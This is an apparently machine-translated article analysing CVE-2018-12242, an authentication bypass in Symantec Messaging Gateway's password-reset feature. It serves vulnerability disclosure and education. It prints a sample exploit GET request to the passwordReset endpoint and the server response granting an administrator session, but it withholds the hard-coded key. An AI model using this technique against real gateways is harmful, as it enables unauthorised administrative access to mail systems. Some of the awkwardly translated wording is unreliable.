Shulou(Shulou.com)05/31 Report--

This article is about how to do email gateway authentication to bypass the vulnerability CVE-2018-12242 analysis. The editor thinks it is very practical, so I share it with you. I hope you can get something after reading this article. Let's take a look at it with the editor.

Preface

In some information security assessment work, it is sometimes difficult to clearly understand the periphery of the target network. As a last resort, we may conduct security tests on the exposed application services of the target network. In this case, there will often be a breakthrough, just like the Symantec email gateway authorization bypass vulnerability (CVE-2018-12242) that I want to share here.

Find a loophole

Symantec Mail Gateway (Symantec Messaging Gateway), like most application login interfaces, also has a password reset feature. When a login attempt fails, a link to the "forget password" button appears, after which the user name is prompted for input. Here, Symantec email Gateway contains an encryption token (token) in the password reset link to ensure that the password reset must be the corresponding user, so as to verify the legal identity of the password reset user.

To be sure, the token is encrypted, so how do we get the key? Fortunately, there was a disclosure similar to bug in Symantec's mail gateway. Security researcher Philip Pettersson found an authentication bypass vulnerability in Symantec's mail gateway, which involves parameters encrypted in a similar way. He also analyzed a hard-coded key, which he described as follows:

Very well, the encryption uses a static password generated by the PBEWithMD5AndDES algorithm and is simply stored in its source code, but I will not reveal the encryption password or the complete encryption notification string here.

Vulnerability testing

Come back to our test. In fact, during the installation of Symantec email gateway, this password key is static, and we will not publish this password information here. Under this encryption mechanism, if an attacker initiates encryption in the form of "admin:" in the encryption token (token) and passes it to the following GET parameter "authorization", he will receive a valid administrator session. The following is an example of the corresponding GET request:

GET / brightmail/action2.do?method=passwordReset&authorization=%3d HTTP/1.1Host: 192.168.17.15Connection: closeCache-Control: max-age=0Origin: https://192.168.17.15User-Agent: Mozilla/5.0 (X11; Linux x86 / 64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.62 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/* Q=0.8Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9

The response from Symantec Gateway is as follows:

HTTP/1.1 302 FoundServer: Apache-Coyote/1.1Cache-Control: no-store,no-cachePragma: no-cacheExpires: Thu, 01 Jan 1970 00:00:00 GMTX-Frame-Options: SAMEORIGINSet-Cookie: JSESSIONID=97B8786DB8CC163EB2A4C595D1028E1D; Path=/brightmail; Secure; HttpOnlyLocation: / brightmail/viewWelcome.do?userID=1Content-Type: text/html;charset=UTF-8Content-Length: 0Connection: close

The request and response in Brup are as follows:

Of course, the generated Cookie message is a valid administrator session:

Summary

This vulnerability is exploited on the premise that the Symantec mail gateway is enabled for password reset.

The damage degree of the vulnerability is: high

Use scenarios: remotely

CVSS score: 7.1

Affected version: all versions prior to 10.6.6 of Symantec Mail Gateway

Report vulnerabilities on July 11, 2018

Classification vulnerabilities on July 11, 2018

Fix vulnerabilities and issue security bulletins and patches on September 12, 2018

The above is how to conduct mail gateway authentication to bypass the vulnerability CVE-2018-12242 analysis, the editor believes that there are some knowledge points that we may see or use in our daily work. I hope you can learn more from this article. For more details, please follow the industry information channel.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.